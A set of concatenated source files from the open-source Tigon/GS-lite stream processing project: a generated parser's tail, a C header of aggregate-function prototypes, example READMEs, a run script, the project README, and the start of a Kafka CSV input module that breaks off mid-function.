#line 644 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[0].strval));}
#line 2757 "fta.tab.cc" /* yacc.c:1646 */
break;
case 169:
#line 645 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2763 "fta.tab.cc" /* yacc.c:1646 */
break;
case 170:
#line 646 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2769 "fta.tab.cc" /* yacc.c:1646 */
break;
case 171:
#line 647 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2775 "fta.tab.cc" /* yacc.c:1646 */
break;
case 172:
#line 648 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-2].plist_t)->append((yyvsp[0].strval));}
#line 2781 "fta.tab.cc" /* yacc.c:1646 */
break;
case 173:
#line 649 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2787 "fta.tab.cc" /* yacc.c:1646 */
break;
case 174:
#line 650 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2793 "fta.tab.cc" /* yacc.c:1646 */
break;
case 175:
#line 651 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-3].plist_t)->append((yyvsp[-1].strval),(yyvsp[0].strval));}
#line 2799 "fta.tab.cc" /* yacc.c:1646 */
break;
case 176:
#line 655 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2805 "fta.tab.cc" /* yacc.c:1646 */
break;
case 177:
#line 656 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2811 "fta.tab.cc" /* yacc.c:1646 */
break;
case 178:
#line 660 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = NULL;}
#line 2817 "fta.tab.cc" /* yacc.c:1646 */
break;
case 179:
#line 661 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-1].plist_t);}
#line 2823 "fta.tab.cc" /* yacc.c:1646 */
break;
case 180:
#line 665 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = new param_list((yyvsp[0].strval));}
#line 2829 "fta.tab.cc" /* yacc.c:1646 */
break;
case 181:
#line 666 "fta.y" /* yacc.c:1646 */
{(yyval.plist_t) = (yyvsp[-2].plist_t)->append((yyvsp[0].strval));}
#line 2835 "fta.tab.cc" /* yacc.c:1646 */
break;
case 182:
#line 670 "fta.y" /* yacc.c:1646 */
{(yyval.namevec_t) = new name_vec((yyvsp[-2].strval),(yyvsp[-1].strval),(yyvsp[0].plist_t));}
#line 2841 "fta.tab.cc" /* yacc.c:1646 */
break;
case 183:
#line 671 "fta.y" /* yacc.c:1646 */
{(yyval.namevec_t) = (yyvsp[-4].namevec_t)->append((yyvsp[-2].strval),(yyvsp[-1].strval), (yyvsp[0].plist_t));}
#line 2847 "fta.tab.cc" /* yacc.c:1646 */
break;
#line 2851 "fta.tab.cc" /* yacc.c:1646 */
default: break;
}
/* User semantic actions sometimes alter yychar, and that requires
that yytoken be updated with the new translation. We take the
approach of translating immediately before every use of yytoken.
One alternative is translating here after every semantic action,
but that translation would be missed if the semantic action invokes
YYABORT, YYACCEPT, or YYERROR immediately after altering yychar or
if it invokes YYBACKUP. In the case of YYABORT or YYACCEPT, an
incorrect destructor might then be invoked immediately. In the
case of YYERROR or YYBACKUP, subsequent parser actions might lead
to an incorrect destructor call or verbose syntax error message
before the lookahead is translated. */
YY_SYMBOL_PRINT ("-> $$ =", yyr1[yyn], &yyval, &yyloc);
YYPOPSTACK (yylen);
yylen = 0;
YY_STACK_PRINT (yyss, yyssp);
*++yyvsp = yyval;
/* Now 'shift' the result of the reduction. Determine what state
that goes to, based on the state we popped back to and the rule
number reduced by. */
yyn = yyr1[yyn];
yystate = yypgoto[yyn - YYNTOKENS] + *yyssp;
if (0 <= yystate && yystate <= YYLAST && yycheck[yystate] == *yyssp)
yystate = yytable[yystate];
else
yystate = yydefgoto[yyn - YYNTOKENS];
goto yynewstate;
/*--------------------------------------.
| yyerrlab -- here on detecting error. |
`--------------------------------------*/
yyerrlab:
/* Make sure we have latest lookahead translation. See comments at
user semantic actions for why this is necessary. */
yytoken = yychar == YYEMPTY ? YYEMPTY : YYTRANSLATE (yychar);
/* If not already recovering from an error, report this error. */
if (!yyerrstatus)
{
++yynerrs;
#if ! YYERROR_VERBOSE
yyerror (YY_("syntax error"));
#else
# define YYSYNTAX_ERROR yysyntax_error (&yymsg_alloc, &yymsg, \
yyssp, yytoken)
{
char const *yymsgp = YY_("syntax error");
int yysyntax_error_status;
yysyntax_error_status = YYSYNTAX_ERROR;
if (yysyntax_error_status == 0)
yymsgp = yymsg;
else if (yysyntax_error_status == 1)
{
if (yymsg != yymsgbuf)
YYSTACK_FREE (yymsg);
yymsg = (char *) YYSTACK_ALLOC (yymsg_alloc);
if (!yymsg)
{
yymsg = yymsgbuf;
yymsg_alloc = sizeof yymsgbuf;
yysyntax_error_status = 2;
}
else
{
yysyntax_error_status = YYSYNTAX_ERROR;
yymsgp = yymsg;
}
}
yyerror (yymsgp);
if (yysyntax_error_status == 2)
goto yyexhaustedlab;
}
# undef YYSYNTAX_ERROR
#endif
}
if (yyerrstatus == 3)
{
/* If just tried and failed to reuse lookahead token after an
error, discard it. */
if (yychar <= YYEOF)
{
/* Return failure if at end of input. */
if (yychar == YYEOF)
YYABORT;
}
else
{
yydestruct ("Error: discarding",
yytoken, &yylval);
yychar = YYEMPTY;
}
}
/* Else will try to reuse lookahead token after shifting the error
token. */
goto yyerrlab1;
/*---------------------------------------------------.
| yyerrorlab -- error raised explicitly by YYERROR. |
`---------------------------------------------------*/
yyerrorlab:
/* Pacify compilers like GCC when the user code never invokes
YYERROR and the label yyerrorlab therefore never appears in user
code. */
if (/*CONSTCOND*/ 0)
goto yyerrorlab;
/* Do not reclaim the symbols of the rule whose action triggered
this YYERROR. */
YYPOPSTACK (yylen);
yylen = 0;
YY_STACK_PRINT (yyss, yyssp);
yystate = *yyssp;
goto yyerrlab1;
/*-------------------------------------------------------------.
| yyerrlab1 -- common code for both syntax error and YYERROR. |
`-------------------------------------------------------------*/
yyerrlab1:
yyerrstatus = 3; /* Each real token shifted decrements this. */
for (;;)
{
yyn = yypact[yystate];
if (!yypact_value_is_default (yyn))
{
yyn += YYTERROR;
if (0 <= yyn && yyn <= YYLAST && yycheck[yyn] == YYTERROR)
{
yyn = yytable[yyn];
if (0 < yyn)
break;
}
}
/* Pop the current state because it cannot handle the error token. */
if (yyssp == yyss)
YYABORT;
yydestruct ("Error: popping",
yystos[yystate], yyvsp);
YYPOPSTACK (1);
yystate = *yyssp;
YY_STACK_PRINT (yyss, yyssp);
}
YY_IGNORE_MAYBE_UNINITIALIZED_BEGIN
*++yyvsp = yylval;
YY_IGNORE_MAYBE_UNINITIALIZED_END
/* Shift the error token. */
YY_SYMBOL_PRINT ("Shifting", yystos[yyn], yyvsp, yylsp);
yystate = yyn;
goto yynewstate;
/*-------------------------------------.
| yyacceptlab -- YYACCEPT comes here. |
`-------------------------------------*/
yyacceptlab:
yyresult = 0;
goto yyreturn;
/*-----------------------------------.
| yyabortlab -- YYABORT comes here. |
`-----------------------------------*/
yyabortlab:
yyresult = 1;
goto yyreturn;
#if !defined yyoverflow || YYERROR_VERBOSE
/*-------------------------------------------------.
| yyexhaustedlab -- memory exhaustion comes here. |
`-------------------------------------------------*/
yyexhaustedlab:
yyerror (YY_("memory exhausted"));
yyresult = 2;
/* Fall through. */
#endif
yyreturn:
if (yychar != YYEMPTY)
{
/* Make sure we have latest lookahead translation. See comments at
user semantic actions for why this is necessary. */
yytoken = YYTRANSLATE (yychar);
yydestruct ("Cleanup: discarding lookahead",
yytoken, &yylval);
}
/* Do not reclaim the symbols of the rule whose action triggered
this YYABORT or YYACCEPT. */
YYPOPSTACK (yylen);
YY_STACK_PRINT (yyss, yyssp);
while (yyssp != yyss)
{
yydestruct ("Cleanup: popping",
yystos[*yyssp], yyvsp);
YYPOPSTACK (1);
}
#ifndef yyoverflow
if (yyss != yyssa)
YYSTACK_FREE (yyss);
#endif
#if YYERROR_VERBOSE
if (yymsg != yymsgbuf)
YYSTACK_FREE (yymsg);
#endif
return yyresult;
}
#line 674 "fta.y" /* yacc.c:1906 */
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#ifndef _RTS_UDAF_H_INCLUDED_
#define _RTS_UDAF_H_INCLUDED_
#ifdef __cplusplus
extern "C" {
#endif
#include "gsconfig.h"
#include "gstypes.h"
#include "rts_external.h"
// Prototypes for the run-time-system (RTS) built-in LFTA user-defined
// aggregate functions (UDAFs).  Implementations live elsewhere in the RTS;
// these declarations let generated LFTA code call them.
//
// Each UDAF exposes the same five entry points, named
// <udaf>_LFTA_AGGR_<PHASE>_ :
//   INIT_    - initialize the per-group scratchpad
//   UPDATE_  - fold one input value into the scratchpad
//   FLUSHME_ - queried by the RTS; nonzero return presumably requests an
//              early flush of this group (confirm in implementation)
//   OUTPUT_  - write the final result out of the scratchpad
//   DESTROY_ - release any resources held by the scratchpad
// avg_udaf: aggregate over gs_uint32_t input, result rendered into a
// gs_string (presumably an average, per the name -- semantics are in the
// implementation).  Scratchpad is an opaque byte pointer (gs_sp_t).
void avg_udaf_lfta_LFTA_AGGR_INIT_(gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_UPDATE_(gs_sp_t,gs_uint32_t);
// NOTE(review): "AGBGR" looks like a typo for "AGGR", inconsistent with
// every other FLUSHME_ declaration below.  Do not rename here without
// confirming the implementation's symbol first -- the declaration must
// match the defined symbol or linkage breaks.
gs_retval_t avg_udaf_lfta_LFTA_AGBGR_FLUSHME_(gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_OUTPUT_(struct gs_string *,gs_sp_t);
void avg_udaf_lfta_LFTA_AGGR_DESTROY_(gs_sp_t);
// moving sum: gs_uint32_t input with an extra UPDATE_ parameter N
// (presumably the window size -- confirm against the implementation);
// result is a gs_uint64_t.
void moving_sum_lfta_LFTA_AGGR_INIT_(gs_sp_t b);
void moving_sum_lfta_LFTA_AGGR_UPDATE_(gs_sp_t b, gs_uint32_t v, gs_uint32_t N);
gs_retval_t moving_sum_lfta_LFTA_AGGR_FLUSHME_(gs_sp_t b);
void moving_sum_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t *r, gs_sp_t b);
gs_retval_t moving_sum_lfta_LFTA_AGGR_DESTROY_(gs_sp_t b);
// FIRST aggregate, one variant per operand type (suffix -> type):
//   (none) -> gs_uint32_t,  INT -> gs_int32_t,  ULL -> gs_uint64_t,
//   LL -> gs_int64_t,  STR -> struct gs_string.
// The scratchpad is simply a value of the operand type.
void FIRST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
gs_retval_t FIRST_lfta_LFTA_AGGR_FLUSHME_(gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void FIRST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
gs_retval_t FIRST_INT_lfta_LFTA_AGGR_FLUSHME_(gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void FIRST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
gs_retval_t FIRST_ULL_lfta_LFTA_AGGR_FLUSHME_(gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void FIRST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
gs_retval_t FIRST_LL_lfta_LFTA_AGGR_FLUSHME_(gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void FIRST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void FIRST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val);
gs_retval_t FIRST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch);
void FIRST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch);
// LAST aggregate; same per-type variants and scratchpad layout as FIRST.
void LAST_lfta_LFTA_AGGR_INIT_(gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_UPDATE_(gs_uint32_t* scratch, gs_uint32_t val);
gs_retval_t LAST_lfta_LFTA_AGGR_FLUSHME_(gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_OUTPUT_(gs_uint32_t* res, gs_uint32_t* scratch);
void LAST_lfta_LFTA_AGGR_DESTROY_(gs_uint32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_INIT_(gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_UPDATE_(gs_int32_t* scratch, gs_int32_t val);
gs_retval_t LAST_INT_lfta_LFTA_AGGR_FLUSHME_(gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_OUTPUT_(gs_int32_t* res, gs_int32_t* scratch);
void LAST_INT_lfta_LFTA_AGGR_DESTROY_(gs_int32_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_INIT_(gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_UPDATE_(gs_uint64_t* scratch, gs_uint64_t val);
gs_retval_t LAST_ULL_lfta_LFTA_AGGR_FLUSHME_(gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_OUTPUT_(gs_uint64_t* res, gs_uint64_t* scratch);
void LAST_ULL_lfta_LFTA_AGGR_DESTROY_(gs_uint64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_INIT_(gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_UPDATE_(gs_int64_t* scratch, gs_int64_t val);
gs_retval_t LAST_LL_lfta_LFTA_AGGR_FLUSHME_(gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_OUTPUT_(gs_int64_t* res, gs_int64_t* scratch);
void LAST_LL_lfta_LFTA_AGGR_DESTROY_(gs_int64_t* scratch);
void LAST_STR_lfta_LFTA_AGGR_INIT_(struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_UPDATE_(struct gs_string* scratch, struct gs_string* val);
gs_retval_t LAST_STR_lfta_LFTA_AGGR_FLUSHME_(struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, struct gs_string* scratch);
void LAST_STR_lfta_LFTA_AGGR_DESTROY_(struct gs_string* scratch);
// count_diff aggregate, per-type variants (suffix -> input type):
//   ui -> gs_uint32_t,  i -> gs_int32_t,  ul -> gs_uint64_t,
//   l -> gs_int64_t,  s -> struct gs_string.
// All variants render their result into a gs_string; scratchpad is an
// opaque byte pointer (gs_sp_t).
void count_diff_lfta_ui_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_ui_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint32_t val) ;
void count_diff_lfta_ui_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_ui_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_ui_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int32_t val) ;
void count_diff_lfta_i_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_i_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_i_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_uint64_t val) ;
void count_diff_lfta_ul_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_ul_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_ul_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_UPDATE_(gs_sp_t s, gs_int64_t val) ;
void count_diff_lfta_l_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_l_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_l_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_INIT_(gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_UPDATE_(gs_sp_t s, struct gs_string *val) ;
void count_diff_lfta_s_LFTA_AGGR_OUTPUT_(struct gs_string *res, gs_sp_t s) ;
void count_diff_lfta_s_LFTA_AGGR_DESTROY_(gs_sp_t s) ;
gs_retval_t count_diff_lfta_s_LFTA_AGGR_FLUSHME_(gs_sp_t s) ;
// running_array_aggr aggregate: gs_uint32_t input, raw char* scratchpad,
// gs_string result.
void running_array_aggr_lfta_LFTA_AGGR_INIT_(char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_UPDATE_(char* scratch, gs_uint32_t val);
gs_retval_t running_array_aggr_lfta_LFTA_AGGR_FLUSHME_(char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_OUTPUT_(struct gs_string* res, char* scratch);
void running_array_aggr_lfta_LFTA_AGGR_DESTROY_(char* scratch);
//////////////////////////////////////////////////////////////////
/// Flip-s sample-based quantiles.
/// Per-type variants (suffix -> input type): ui -> gs_uint32_t,
/// i -> gs_int32_t, ul -> gs_uint64_t, l -> gs_int64_t, f -> gs_float_t.
/// All variants render their result into a gs_string.
/****************************************************************/
/*		LFTA functions					*/
/****************************************************************/
void quant_ui_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_uint32_t);
gs_retval_t quant_ui_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_ui_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_int32_t);
gs_retval_t quant_i_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_i_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_uint64_t);
gs_retval_t quant_ul_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_ul_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_int64_t);
gs_retval_t quant_l_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_l_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_INIT_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_UPDATE_(gs_sp_t, gs_float_t);
gs_retval_t quant_f_udaf_lfta3_LFTA_AGGR_FLUSHME_(gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_OUTPUT_(struct gs_string *, gs_sp_t);
void quant_f_udaf_lfta3_LFTA_AGGR_DESTROY_(gs_sp_t);
/////////////////////////////////////////////////////////
// ==============================================================
//		other rts functions (scalar, not UDAF).
//	sum up unsigned integers expressed as a string with separators,
//	e.g. on input '34|45|56' and sep '|', return 135.
//	This kind of thing is common in Nokia PCMD data.
//	gracefully handle empty entries, e.g. '|8|' should return 8
gs_int64_t sum_uint_in_list(struct gs_string *list, struct gs_string *sepchar);
//	Convert a string to a llong.
//	Has some protection to reject non-numeric characters.
//	a leading minus sign is allowed
gs_int64_t to_llong(struct gs_string *v);
#ifdef __cplusplus
}
#endif
#endif
<file_sep>This example demonstrates a query system reading from a file stream.
gen_feed.py creates the file stream by replacing its contents
every second, checking first if the GS-lite instance has finished
processing the file.
Additional features demonstrated:
- a reference to an interface set in example.gsql
- a reference to a library query in example2.gsql
- the output_spec.cfg has query example putting output on a stream,
while example2 periodically dumps output in files in directory output_dir
- The files in output_dir are in gdat format. Use gs-lite/bin/gdat2ascii
to extract their contents to ascii
- the runall script starts up the query system; note the use of gsprintconsole
for both example and example2
- the killall script ensures that gsprintconsole and gen_feed.py instances
are stopped.
<file_sep>#!/bin/sh
./killexample
sleep 1
./runit
python ./gen_feed.py &
sleep 10
../../bin/gsprintconsole `cat gshub.log` default example &
../../bin/gsprintconsole `cat gshub.log` default example2 &
sleep 1
../../bin/start_processing
<file_sep># Tigon

**Introduction**
**Tigon** is an open-source, real-time, low-latency, high-throughput stream processing framework.
Tigon is a collaborative effort between Cask Data, Inc. and AT&T that combines
technologies from these companies to create a disruptive new framework to handle a diverse
set of real-time streaming requirements.
Cask Data has built technology that provides scalable, reliable, and persistent high-throughput
event processing with high-level Java APIs using Hadoop and HBase.
AT&T has built a streaming engine that provides massively scalable, flexible, and in-memory
low-latency stream processing with a SQL-like query Language.
Together, they have combined to create **Tigon**.
## Getting Started
### Prerequisites
Tigon is supported on *NIX systems such as Linux and Macintosh OS X.
It is not supported on Microsoft Windows.
## License and Trademarks
Copyright © 2014 Cask Data, Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
in compliance with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software distributed under the
License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
either express or implied. See the License for the specific language governing permissions
and limitations under the License.
Cask is a trademark of Cask Data, Inc. All rights reserved.
Apache, Apache HBase, and HBase are trademarks of The Apache Software Foundation. Used with
permission. No endorsement by The Apache Software Foundation is implied by the use of these marks.
<file_sep>This example demonstrates a query system reading from a single file.
The input data file is csvsingle.dat, and it remains after processing.
Additional features demonstrated:
- a reference to a specific interface
- The output is redirected into example1.csv and example2.csv
- The last line is an end-of-data marker.
<file_sep>/* ------------------------------------------------
Copyright 2014 AT&T Intellectual Property
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
------------------------------------------- */
#include <time.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <zlib.h>
#include "errno.h"
#include "stdio.h"
#include "stdlib.h"
#include "gsconfig.h"
#include "gshub.h"
#include "gstypes.h"
#include "lapp.h"
#include "fta.h"
#include "packet.h"
#include "schemaparser.h"
#include "lfta/rts.h"
void fta_init(gs_sp_t device);
void rts_fta_process_packet(struct packet * p);
void rts_fta_done();
#ifdef KAFKA_ENABLED
#include <librdkafka/rdkafka.h>
time_t st_time;
gs_uint32_t max_field_kafka = CSVELEMENTS;
#define KAFKA_TIMEOUT 1000 // timeout value for getting next batach of records (in ms)
gs_sp_t dev;
static int fd=-1;
static struct packet cur_packet;
static gs_sp_t config_fname;
static gs_sp_t topics_fname;
static gs_sp_t line;
static ssize_t len;
static size_t line_len;
static gs_uint32_t lineend=0;
static gs_uint8_t csvdel = ',';
static gs_uint32_t verbose=0;
static gs_uint32_t startupdelay=0;
#define MAX_KAFKA_TOPICS 256
static rd_kafka_t *rk;
static rd_kafka_conf_t *conf;
static rd_kafka_queue_t *rkqu = NULL;
static rd_kafka_topic_t *topic_list[MAX_KAFKA_TOPICS];
gs_uint32_t num_topics;
#include "lfta/csv_parser.h"
/* Read one Kafka topic name per line from fname (at most max_topics lines),
 * create a topic handle for each, and start consuming it (partition 0,
 * starting at RD_KAFKA_OFFSET_END) into kqueue.
 * Returns the number of topics started, or -1 if the file cannot be opened.
 * Exits the process if a topic cannot be added to the consume queue. */
static int read_topic_list (rd_kafka_t * rk, rd_kafka_queue_t *kqueue, rd_kafka_topic_t **topic_list, int max_topics, const char *fname) {
	FILE *fp;
	int line = 0;	/* doubles as topic count and topic_list index */
	char buf[512];
	if (!(fp = fopen(fname, "r"))) {
		fprintf(stderr, "Unable to open kafka topic list file %s\n", fname);
		return -1;
	}
	while (line < max_topics && fgets(buf, sizeof(buf), fp)) {
		strtok(buf, " \t\r\n"); // terminate the topic name at the first whitespace/newline
		topic_list[line] = rd_kafka_topic_new(rk, buf, NULL);
		int r = rd_kafka_consume_start_queue(topic_list[line], 0, RD_KAFKA_OFFSET_END, kqueue);
		if (r == -1) {
			fprintf(stderr, "Unable to add topic %s to queue: %s\n", buf, rd_kafka_err2str(rd_kafka_last_error()));
			exit(1);
		}
		line++;
	}
	fclose(fp);
	return line;
}
/* Load librdkafka configuration properties from a "key=value" file.
 * Blank lines and lines whose first non-blank character is '#' are ignored.
 * Returns 0 on success, -1 on open/parse/set failure (after printing a
 * diagnostic with the offending file name and line number). */
static int read_conf_file (rd_kafka_conf_t *conf, const char *fname) {
	FILE *fp;
	int line = 0;
	char buf[10240];
	char errstr[512];

	if (!(fp = fopen(fname, "r"))) {
		fprintf(stderr, "Unable to open kafka configuration file %s\n", fname);
		return -1;
	}

	while (fgets(buf, sizeof(buf), fp)) {
		char *s = buf;
		char *t;
		rd_kafka_conf_res_t r = RD_KAFKA_CONF_UNKNOWN;

		line++;

		/* skip leading whitespace, then blank lines and comments */
		while (isspace((int)*s))
			s++;
		if (!*s || *s == '#')
			continue;

		/* strip the trailing newline, if any */
		if ((t = strchr(buf, '\n')))
			*t = '\0';

		/* split on the first '=': key must be non-empty and a value must follow */
		t = strchr(buf, '=');
		if (!t || t == s || !*(t+1)) {
			fprintf(stderr, "Error reading kafka config file %s:%d: expected key=value\n", fname, line);
			fclose(fp);
			return -1;
		}
		*(t++) = '\0';

		/* set config property */
		r = rd_kafka_conf_set(conf, s, t, errstr, sizeof(errstr));
		if (r == RD_KAFKA_CONF_OK)
			continue;

		/* fixed garbled message: was "Unable set to set ..." */
		fprintf(stderr, "Unable to set kafka configuration property %s:%d: %s=%s: %s\n", fname, line, s, t, errstr);
		fclose(fp);
		return -1;
	}
	fclose(fp);
	return 0;
}
/* librdkafka per-message callback: parse one CSV record and hand the
 * resulting packet to the FTA processing path.
 * Error "messages" (including RD_KAFKA_RESP_ERR__PARTITION_EOF, which just
 * means we caught up with the log) carry no usable payload and are skipped. */
static void msg_consume (rd_kafka_message_t *rkmessage, void *opaque) {
	if (rkmessage->err)
		return;

	csv_parse_line(rkmessage->payload, rkmessage->len);
	rts_fta_process_packet(&cur_packet);
}
/* Initialize the Kafka CSV replay interface from interface properties:
 * verbosity, kafka config/topic file names, CSV delimiter, startup delay
 * and the maximum CSV field index to parse. Creates the consumer handle,
 * consume queue and per-topic consumers.
 * Exits the process on fatal misconfiguration; otherwise returns 0. */
static gs_retval_t kafka_replay_init(gs_sp_t device)
{
	gs_sp_t verbosetmp;
	gs_sp_t delaytmp;
	gs_sp_t tempdel;
